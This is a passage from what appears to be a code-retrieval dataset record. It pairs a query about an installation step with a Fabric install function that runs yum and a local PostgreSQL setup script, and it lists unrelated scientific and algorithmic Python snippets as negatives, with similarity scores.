primes = [ d + 1 for d in divisors(m) if isprime(d + 1) ]\n\n a, b = 1, 1\n\n for p in primes:\n a *= p\n b *= p - 1\n\n L = m\n U = int(math.ceil(m*(float(a)/b)))\n\n P = p = 2\n primes = []\n\n while P <= U:\n p = nextprime(p)\n primes.append(p)\n P *= p\n\n P //= p\n b = 1\n\n for p in primes[:-1]:\n b *= p - 1\n\n U = int(math.ceil(m*(float(P)/b)))\n\n return L, U", "def eval(self, sample):\n '''\n jv = sample.get(JOINT_VELOCITIES)\n eepv = sample.get(END_EFFECTOR_POINT_VELOCITIES)\n\n boxpos = jv[:, 2:5]\n fingerpos = eepv[:, 7:10]\n tgtpos = np.zeros((100,3))\n for i in range(100):\n tgtpos[i] = [0.6, 0.2, 0.1]\n \n fetchdist = np.sum((boxpos - fingerpos) ** 2, axis=1)\n liftdist = np.sum((boxpos - tgtpos) ** 2, axis=1)\n \n l = fetchdist + liftdist\n '''\n\n eept = sample.get(END_EFFECTOR_POINTS)\n eepv = sample.get(END_EFFECTOR_POINT_VELOCITIES)\n sample_u = sample.get_U()\n cfrc_ext = np.concatenate((eept[:, 13:56], eepv[:, 0:41]), axis = 1)\n # vec = eepv[:, 64:66] \n # dist = np.sum(np.square(vec), axis=1) / 5\n forward_reward = eepv[:, 53]\n scaling = 150\n ctrl_cost = 0.5 * 1e-2 * np.sum(np.square(sample_u / scaling), axis = 1)\n # contact_cost = 0.5 * 1e-3 * np.sum(np.square(cfrc_ext), axis = 1)\n # survive_reward = 0.5\n \n l = -forward_reward + ctrl_cost\n\n prefix=''\n logger.record_tabular('PolReturn', -sum(l))\n\n ave_vel = np.mean(forward_reward)\n min_vel = np.min(forward_reward)\n max_vel = np.max(forward_reward)\n std_vel = np.std(forward_reward)\n logger.record_tabular(prefix+'PolAverageVelocity', ave_vel)\n logger.record_tabular(prefix+'PolMinVelocity', min_vel)\n logger.record_tabular(prefix+'PolMaxVelocity', max_vel)\n logger.record_tabular(prefix+'PolStdVelocity', std_vel)\n logger.dump_tabular(with_prefix=False)\n \n lx, lu, lxx, luu, lux = 0, 0, 0, 0, 0\n\n '''\n # Compute weighted sum of each cost value and derivatives.\n weight = self._weights[0]\n l = l * weight\n lx = lx * weight\n lu = lu * weight\n lxx = lxx * weight\n luu = luu * weight\n lux = lux * weight\n for i in range(1, len(self._costs)):\n pl, plx, plu, plxx, pluu, plux = self._costs[i].eval(sample)\n weight = self._weights[i]\n l = l + pl * weight\n lx = lx + plx * weight\n lu = lu + plu * weight\n lxx = lxx + plxx * weight\n luu = luu + pluu * weight\n lux = lux + plux * weight\n '''\n \n return l, lx, lu, lxx, luu, lux", "def expected_counts(p0, T, n): \n M=T.shape[0]\n if n<=M:\n return ec_matrix_vector(p0, T, n)\n else:\n return ec_geometric_series(p0, T, n)", "def prove_NA1() -> Proof:\n # Optional Task 6.9a", "def fig16():\n # fmt: off\n tpm = np.array([\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [1, 0, 0, 0, 0, 0, 0],\n [1, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [1, 0, 0, 0, 0, 1, 1],\n [1, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n ])\n cm = np.array([\n [0, 1, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 1, 0, 0, 0, 0, 0],\n [0, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 0, 0, 0, 1, 1],\n ])\n # fmt: on\n return Network(tpm, cm=cm, node_labels=LABELS[:tpm.shape[1]])", "def viterbi(self):\n # initialisation\n self.phi = zeros((self.noOfEmmittingStates+2, self.T + 1))\n self.phi[0,0] = 1.0\n for i in range(1,self.noOfEmmittingStates+2):\n self.phi[i,0] = 0.0\n for t in range(1,self.T+1):\n self.phi[0,t] = 0.0\n self.traceback = zeros((self.noOfEmmittingStates+1, self.T+1))\n\n # main recursion\n for t in range(1, self.T + 1):\n for j in range(1, self.noOfEmmittingStates + 1):\n phiTemp = zeros((self.noOfEmmittingStates + 1, 1))\n for k in range(self.noOfEmmittingStates+1):\n phiTemp[k,0] = self.phi[k,t-1] * self.transitionMatrix[k, j-1]\n self.traceback[j-1,t-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[j, t] = phiTemp.max(0) * self.b[j-1, t-1]\n\n # last column - set states which can't reach term to 0, sub for term\n for j in range(1,self.noOfEmmittingStates + 1):\n if self.transitionMatrix[j,-1] == 0:\n self.phi[j,-1] = 0\n phiTemp = zeros((self.noOfEmmittingStates+1, 1))\n for k in range(self.noOfEmmittingStates + 1):\n phiTemp[k,0] = self.phi[k,-1] * self.transitionMatrix[k,-1]\n self.traceback[-1,-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[-1,-1] = phiTemp.max(0)", "def test_superposition_ud_cnot():\n program = dedent(\n \"\"\"\\\n register q0[0]\n register q1[1]\n H q1\n CNOT q1 q0\n \"\"\"\n )\n\n result = run(program, run_gate_array, return_distribution=True)\n assert isclose(result, [0.5, 0.0, 0.0, 0.5]).all()", "def V2E(V):\n# for v in m/s returns energy in meV\n return 5.227e-6*V*V", "def eulerphi(n):\r\n\treturn euler_phi(n)", "async def _design_lvl_shift_internal_inv(self, pseg: int, nseg: int, out_inv_m: int,\n fanout: float,\n pinfo: Any, tbm_specs: Dict[str, Any], is_ctrl: bool,\n has_rst: bool, dual_output: bool,\n vin: str, vout: str) -> Tuple[int, int]:\n if is_ctrl: # size with fanout\n inv_nseg = int(np.round(nseg / fanout))\n inv_nseg = 1 if inv_nseg == 0 else inv_nseg\n inv_pseg = int(np.round(pseg / fanout))\n inv_pseg = 1 if inv_pseg == 0 else inv_pseg\n self.log(f\"Calculated inv to need nseg : {inv_nseg}\")\n self.log(f\"Calculated inv to need pseg : {inv_pseg}\")\n return inv_pseg, inv_nseg\n\n # First size the NMOS in the inverter assuming a reasonably sized PMOS\n inv_nseg = await self._design_lvl_shift_inv_pdn(pseg, nseg, out_inv_m, fanout, pinfo,\n tbm_specs, has_rst, dual_output, vin, vout)\n self.log(f\"Calculated inv to need at least nseg: {inv_nseg}\")\n\n # Now using the inverter pull down size, we size the inverter pull up PMOS\n inv_pseg, inv_nseg = await self._design_lvl_shift_inv_pun(pseg, nseg, inv_nseg, out_inv_m,\n fanout, pinfo,\n tbm_specs, has_rst, dual_output,\n vin, vout)\n self.log(f\"Calculated inv to need pseg: {inv_pseg} and nseg: {inv_nseg}\")\n return inv_pseg, inv_nseg", "def gen_new_phiw_div_phib_arr(N_PROCESSES, phiw_div_phib_arr_new, cond_GT, fcn_D, fcn_eta, z_div_L_arr, phiw_div_phib_arr, Pi_div_DLP_arr, weight, gp_arr, gm_arr, yt_arr, phi_yt_arr, ID_yt_arr, Ieta_yt_arr):\n phi_b = cond_GT['phi_bulk']\n ed = cond_GT['epsilon_d']\n membrane_geometry = cond_GT['membrane_geometry']\n \n Ny = size(yt_arr)\n # # Python allocate the name for phi_yt_arr[0], this is the same as reference value for C++ \" y= &x\"\n phi_arr_z0 = phi_yt_arr[0]\n Ieta_arr_z0= Ieta_yt_arr[0]\n ID_arr_z0 = ID_yt_arr[0]\n\n ind_z0 = 0 #z-index at inlet\n \n z0_div_L = 0. #z-coord at inlet\n \n r0_div_R = 0. #r-coord at the centerline of pipe\n rw_div_R = 1. #r-coord at the membrane wall\n \n vw_div_vw0_z0 = get_v_conv(rw_div_R, z0_div_L, Pi_div_DLP_arr[ind_z0], cond_GT, gp_arr[ind_z0], gm_arr[ind_z0])\n gen_phi_wrt_yt(z0_div_L, phiw_div_phib_arr[ind_z0]*phi_b, fcn_D, vw_div_vw0_z0, yt_arr, phi_arr_z0, cond_GT)\n gen_INT_inv_f_wrt_yt(yt_arr, phi_arr_z0, Ieta_arr_z0, fcn_eta, cond_GT)\n Ieta_arr_z0 /= Ieta_arr_z0[-1] # CHECK\n gen_INT_inv_f_wrt_yt(yt_arr, phi_arr_z0, ID_arr_z0, fcn_D, cond_GT)\n\n uZ_z0 = get_uZ_out(z0_div_L, cond_GT['k'], cond_GT['Bp'], cond_GT['Bm'], gp_arr[ind_z0], gm_arr[ind_z0])\n F2_0 = cal_F2_Z(vw_div_vw0_z0, ed, yt_arr, Ieta_arr_z0, ID_arr_z0, uZ_z0, membrane_geometry)\n\n Nz = size(z_div_L_arr)\n if (N_PROCESSES ==1):\n # when only single-processor is allocated\n for i in range(1, Nz):\n phiw_div_phib_arr_new[i] = process_at_zi(z_div_L_arr[i], phiw_div_phib_arr[i]*phi_b, Pi_div_DLP_arr[i], cond_GT, gp_arr[i], gm_arr[i], yt_arr, phi_yt_arr[i], Ieta_yt_arr[i], fcn_eta, ID_yt_arr[i], fcn_D, F2_0)\n else:\n # this uses multiprocessing packages\n import multiprocessing as mp\n \n pool = mp.Pool(N_PROCESSES)\n args_list = [(z_div_L_arr[i], phiw_div_phib_arr[i]*phi_b, Pi_div_DLP_arr[i], cond_GT, gp_arr[i], gm_arr[i], yt_arr, phi_yt_arr[i], Ieta_yt_arr[i], fcn_eta, ID_yt_arr[i], fcn_D, F2_0)\\\n for i in range(1, Nz)]\n phiw_div_phib_arr_new[1:] = pool.starmap(process_at_zi, args_list)\n pool.close()\n pool.join()\n\n cnt_EXCEED = 0 \n for i,x in enumerate(phiw_div_phib_arr_new):\n\n x = x*cond_GT['phi_bulk']\n if x > cond_GT['phi_freeze']:\n cnt_EXCEED += 1\n phiw_div_phib_arr_new[i] = cond_GT['phi_freeze']/cond_GT['phi_bulk'] # this prevent the accidently beyond the freezing concentration\n if(cnt_EXCEED>0):\n print('Warning: exceed phi_freeze %d times out of %d\\n'%(cnt_EXCEED, cond_GT['Nz']))\n\n FPI_operator(cond_GT['weight'], phiw_div_phib_arr, phiw_div_phib_arr_new, N_skip=1) # phiw(0) must be phib.\n\n return 0", "def marcovNuc (i = random.choice(stateSpace), step = 100):\n # matrix of transition probabilities\n #matrix = [[0.25, 0.25, 0.25, 0.25], [0.25, 0.25, 0.25, 0.25], [0.25, 0.25, 0.25, 0.25], [0.25, 0.25, 0.25, 0.25]] \n matrix = [[0.4, 0.3, 0.2, 0.1], [0.4, 0.3, 0.2, 0.1], [0.4, 0.3, 0.2, 0.1], [0.4, 0.3, 0.2, 0.1]] \n step += 1 # add one to the range because we remove it at the end\n sims = [] # List to hold the results of the Marcov chain\n sims.append(i) # append the seed value to the sims list\n for x in range(step):\n \n if sims[-1] == 'A':\n w = np.random.random() # Random number generator\n # the next set of if statements determine where the random number \n # sits on the number line of probabilities\n if matrix[0][0] > w:\n sims.append('A')\n elif matrix[0][1] + matrix[0][0] > w:\n sims.append('C')\n elif matrix[0][2] + matrix[0][1] + matrix[0][0] > w:\n sims.append('G')\n else:\n sims.append('T')\n elif sims[-1] == 'C':\n x = np.random.random()\n if matrix[1][0] > x:\n sims.append('A')\n elif matrix[1][1] + matrix[1][0] > x:\n sims.append('C')\n elif matrix[1][2] + matrix[1][1] + matrix[1][0] > x:\n sims.append('G')\n else:\n sims.append('T')\n \n elif sims[-1] == 'G':\n y = np.random.random()\n if matrix[2][0] > y:\n sims.append('A')\n elif matrix[2][1] + matrix[2][0] > y:\n sims.append('C')\n elif matrix[2][2] + matrix[2][1] + matrix[2][0] > y:\n sims.append('G')\n else:\n sims.append('T')\n\n else:\n z = np.random.random()\n if matrix[3][0] > z:\n sims.append('A')\n elif matrix[3][1] + matrix[3][0] > z:\n sims.append('C')\n elif matrix[3][2] + matrix[3][1] + matrix[3][0] > z:\n sims.append('G')\n else:\n sims.append('T')\n\n return sims[1:-1] # remove the initial value (the seed)", "def set_T_lm(self):\n self.delta_T_lm_array = ( ((self.exh.T_outlet_array -\n self.cool.T_inlet_array) - (self.exh.T_inlet_array -\n self.cool.T_outlet_array)) / np.log((self.exh.T_outlet_array -\n self.cool.T_inlet_array) / (self.exh.T_inlet_array -\n self.cool.T_outlet_array)) )", "def eulerphi(n):\n\treturn euler_phi(n)", "def main() -> int:\n ucvm_out = \"\"\n for j in frange(CORNERS[\"bl\"][\"n\"], CORNERS[\"ur\"][\"n\"], SPACING):\n for i in frange(CORNERS[\"bl\"][\"e\"], CORNERS[\"ur\"][\"e\"] + SPACING, SPACING):\n ucvm_out += \"%.2f %.2f 0\\n\" % (i, j)\n os.chdir(\"/Users/davidgil/ucvm-15.10.0/bin\")\n proc = Popen(\n [\"./ucvm_query\", \"-f\", \"../conf/ucvm.conf\"], stdout=PIPE, stdin=PIPE, stderr=STDOUT\n )\n out_arr = np.zeros(\n shape=(\n int((CORNERS[\"ur\"][\"n\"] - CORNERS[\"bl\"][\"n\"]) / SPACING) + 2,\n int((CORNERS[\"ur\"][\"e\"] - CORNERS[\"bl\"][\"e\"]) / SPACING) + 2\n )\n )\n output = proc.communicate(input=ucvm_out.encode(\"ASCII\"))[0]\n i = 0\n j = 0\n for line in output.decode(\"ASCII\").split(\"\\n\")[2:-1]:\n line_split = line.split()\n try:\n out_arr[j][i] = float(line_split[4])\n except IndexError:\n print(line_split)\n if i == int((CORNERS[\"ur\"][\"e\"] - CORNERS[\"bl\"][\"e\"]) / SPACING):\n i = 0\n j += 1\n else:\n i += 1\n np.save(\"vs30.dat\", out_arr)\n return 0", "def em_step(t, eng, fre):\n\t# TODO\n tcount = {}\n total = {}\n for word_eng in t:\n total[word_eng] = 0\n for word_fre in t[word_eng]:\n t[word_eng][word_fre] = 0\n num_sentences = len(eng)\n for i in range(num_sentences):\n list_eng = eng[i].split(\" \")\n list_fre = fre[i].split(\" \")\n for word_fre in set(list_fre):\n denom_c = 0\n for word_eng in set(list_eng):\n denom_c += t[word_eng][word_fre]*list_fre.count(word_fre)\n for word_eng in set(list_eng):\n tcount[word_eng][word_fre] += t[word_eng][word_fre]*list_fre.count(word_fre)*list_eng(word_eng)/denom_c\n total[word_eng] = t[word_eng][word_fre]*list_fre.count(word_fre)*list_eng(word_eng)/denom_c\n for word_eng in total:\n for word_fre in tcound[word_eng]:\n t[word_eng][word_fre] = tcound[word_eng][word_fre]/total[word_eng]", "def exercise_b2_113():\r\n pass", "def test_uneven_sw():\n B = 100\n t = 1\n H = 30\n E = 20000\n sections = ((2 * B, t, 0, E), (B, t, H - t, E))\n EI, top, bot = bm.EI(sections, E)\n assert 1.95 < abs(bot) / top < 1.96", "def _mn_par_ ( self , i ) :\n if not i in self : raise IndexError\n #\n val = ctypes.c_double ( 0 ) \n err = ctypes.c_double ( 0 ) \n #\n res = self.GetParameter ( i , val , err )\n #\n val = float ( val.value )\n err = float ( err.value )\n #\n return VE ( val , err*err )" ]
[ "0.5948996", "0.5655197", "0.5646285", "0.5632018", "0.5629894", "0.5600689", "0.55927324", "0.54705757", "0.54594123", "0.5431765", "0.5404841", "0.5401604", "0.5367439", "0.53368443", "0.5317328", "0.53077716", "0.52990746", "0.52621627", "0.52585423", "0.52466846", "0.52450603", "0.5238577", "0.5235679", "0.5223775", "0.5216934", "0.52106124", "0.52087164", "0.5193675", "0.5188455", "0.5186024", "0.51597536", "0.5159132", "0.5159009", "0.515671", "0.51557046", "0.5153941", "0.515064", "0.51490223", "0.5148604", "0.51405764", "0.51242006", "0.51230866", "0.5121098", "0.51169574", "0.50965106", "0.5094377", "0.5093582", "0.50931126", "0.5091448", "0.5090482", "0.50898373", "0.5087949", "0.50874853", "0.5085533", "0.50783527", "0.50763047", "0.5075695", "0.5070952", "0.50646245", "0.50616425", "0.50553375", "0.5048299", "0.50445664", "0.50444627", "0.5035679", "0.50336206", "0.502815", "0.5020968", "0.50193655", "0.5016787", "0.5015277", "0.50135654", "0.5010255", "0.5000162", "0.49981293", "0.49964157", "0.49944356", "0.49940455", "0.49935564", "0.49926898", "0.49910465", "0.4990586", "0.49885014", "0.49878007", "0.49867198", "0.4986022", "0.49833173", "0.4977892", "0.49654064", "0.49626786", "0.49600217", "0.49582273", "0.49545735", "0.49479085", "0.49451637", "0.49369237", "0.4935183", "0.4930822", "0.492511", "0.49233764", "0.4916852" ]
0.0
-1
Implementation of TPMINVNOM00000 Step 1.2
def install(version=minv.__version__, release="1"): sudo("yum install -y %s" % " ".join(RPMS)) sudo("yum install -y minv-%s-%s.noarch.rpm" % (version, release)) sudo( 'printf "abcdefghijklmnopq\nabcdefghijklmnopq" ' '| sh minv_install_postgresql.sh --tablespace /disk/minv_tablespace/' )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getTru(n,int_method,func) :\n m = np.asarray([0.5,1,1.5,2,2.5,3,3.5,4,4.5,5,6,7,8,9,10])\n bes = np.asarray([-0.5,0,0.43675,0.47773,0.49231,0.49316,0.49280,0.50325,\n 0.51140,0.52169,0.55823,0.58086,0.60463,0.61483,0.66995])\n p = np.asarray([1,0,0.61007,0.77491,0.84071,0.87689,0.89914,0.91365,\n 0.92449,0.93279,0.94451,0.95289,0.95904,0.96385,\n 0.96731])\n h1 = np.asarray([0,0,-0.07257,-0.04963,-0.03313,-0.02282,-0.01648,\n -0.01248,-0.00970,-0.00773,-0.00522,-0.00369,-0.00272,\n -0.00206,-0.00164])\n h2 = np.asarray([0,0,-0.20048,-0.15556,-0.12070,-0.09611,-0.07919,\n -0.06747,-0.05829,-0.05106,-0.04060,-0.03311,-0.02768,\n -0.02353,-0.02053])\n h3 = np.asarray([0,0,0.01647,0.08284,0.14390,0.19680,0.24168,0.27969,\n 0.31280,0.34181,0.39002,0.42942,0.46208,0.48997,0.51325])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h1,int_h2,int_h3])", "def TR_algo3(h, vd=2):\n ve = 0\n vd = 2\n p = [0]*N\n for i in range(M-1, -1, -1):\n w = [bit_component(h, i*N+ii) for ii in range(N)]\n #print(i, w)\n w = sum( [wx*2**j for j, wx in enumerate(w)] )\n #print(i, w, gc(w))\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(N):\n p[j] += bit_component(l, j) << i\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % N\n return p", "def ftlan_E1c(hop, v0, T, m=50, Min_b=10e-10, Min_m=5, kB=1, norm = np.linalg.norm):\n# def Tri_diag(a1, b1):\n# mat = np.diag(b1, -1) + np.diag(a1, 0) + np.diag(b1, 1)\n# e, w = np.linalg.eigh(mat)\n# return e, w\n\n beta = 1./(T * kB)\n E = 0.\n a, b = [], []\n v0 = v0/norm(v0)\n Hv = hop(v0)\n a.append(v0.dot(Hv))\n v1 = Hv - a[0] * v0\n b.append(norm(v1))\n if b[0] < Min_b:\n return 0\n\n v1 = v1/b[0]\n Hv = hop(v1)\n a.append(v1.dot(Hv))\n\n for i in range(1, m - 1):\n v2 = Hv - b[i - 1] * v0 - a[i] * v1\n b.append(norm(v2))\n if abs(b[i]) < Min_b:\n b.pop()\n break\n\n v2 = v2/b[i]\n Hv = hop(v2)\n a.append(v2.dot(Hv))\n v0 = v1.copy()\n v1 = v2.copy()\n \n a = np.asarray(a)\n b = np.asarray(b)\n\n eps, phi = Tri_diag(a, b)\n l = len(eps)\n# Eo = eps[0]\n# eps = eps-Eo\n exp_eps = np.exp(-beta * eps)\n E = np.sum(exp_eps * eps * phi[0, :]**2.)\n Z = np.sum(exp_eps * phi[0, :]**2.)\n# for i in range(len(eps)):\n# E += exp_eps[i] * eps[i] * phi[0, i]**2\n\n# E = E + Eo\n# de = eps[:, np.newaxis] - eps\n# for i in range(l):\n# E += eps[i] * phi[0, i]**2./np.sum(np.exp(-beta*de[:l, i])*(phi[0, :l]**2.))\n return E, Z", "def tpm3_1_8_end_genomic():\n return \"TPM3\", \"NC_000001.11\", 154170399, 154170469, -1", "def cond_depend_tpm():\n # fmt: off\n tpm = np.array([\n [1.0, 0.0, 0.0, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.0, 0.0, 1.0],\n ])\n # fmt: on\n return tpm", "def prove_NI() -> Proof:\n # Optional Task 6.7e", "def test_sw2():\n B1 = 100\n B2 = 200\n h = 18\n t = 1\n H = h + 2 * t\n E1 = 20000\n E2 = 10000\n sections = ((B1, t, 0, E1), (B2, t, h + t, E2))\n EI, top, bot = bm.EI(sections, E1)\n EIc = E1 * B1 * (H ** 3 - h ** 3) / 12\n assert 0.99 < EI / EIc < 1.01", "def prove_NN() -> Proof:\n # Optional Task 6.7c", "def system(p):\r\n\r\n C1, C2, C3, C4, C5, C6, C7, C8, \\\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22, \\\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34,\\\r\n C35, C36, C37, C38, C39, C40, C41, C42, C43, \\\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56 = p\r\n\r\n C = [C1, C2, C3, C4, C5, C6, C7, C8,\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22,\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34, C35, C36, C37,\r\n C38, C39, C40, C41, C42, C43,\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56]\r\n\r\n eqs = [C[i] * (Kd[i] + Rtot - sum(C)) + Etot[i] * (sum(C) - Rtot) for i in range(n)]\r\n\r\n return eqs", "def test_get_nveto_pmts(self):\n pass", "def tpm3_1_8_start_genomic():\n return \"TPM3\", \"NC_000001.11\", 154191901, 154192135, -1", "def prove_CM() -> Proof:\n # Optional Task 6.7f", "def stepFunction(Hin, m):\n if makeReport:\n reporter.addHeader2(\"stepFunction(%s,%s)\"%(hex(Hin), hex(m)))\n # step1. generating keys\n C2 = 0\n C3 = 0xff00ffff000000ffff0000ff00ffff0000ff00ff00ff00ffff00ff00ff00ff00\n C4 = 0\n U = Hin\n V = m\n W = U ^ V\n K1 = transformP(W)\n\n U = transformA(U)^C2\n V = transformA(transformA(V))\n W = U ^ V\n K2 = transformP(W)\n\n U = transformA(U)^C3\n V = transformA(transformA(V))\n W = U ^ V\n K3 = transformP(W)\n\n U = transformA(U)^C4\n V = transformA(transformA(V))\n W = U ^ V\n K4 = transformP(W)\n\n if makeReport:\n reporter.addBold(\"Generated keys:\")\n reporter.addList([hex(K1), hex(K2), hex(K3), hex(K4)])\n\n # step2. crypting tranformation\n Hin_cut = Hin # we need Hin for the next step, but this step cuts Hin\n h1 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h2 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h3 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h4 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n s1 = gost28147.cryptBlock(h1, K1)\n s2 = gost28147.cryptBlock(h2, K2)\n s3 = gost28147.cryptBlock(h3, K3)\n s4 = gost28147.cryptBlock(h4, K4)\n S = s4\n S = cryptBlocks.concat(S, s3, 64)\n S = cryptBlocks.concat(S, s2, 64)\n S = cryptBlocks.concat(S, s1, 64)\n if makeReport:\n reporter.addBold(\"Crypting transformation:\")\n reporter.addList([\n \"gost28147(%s,%s)=%s\"%(hex(h1),hex(K1),hex(s1)),\n \"gost28147(%s,%s)=%s\"%(hex(h2),hex(K2),hex(s2)),\n \"gost28147(%s,%s)=%s\"%(hex(h3),hex(K3),hex(s3)),\n \"gost28147(%s,%s)=%s\"%(hex(h4),hex(K4),hex(s4)),\n ])\n 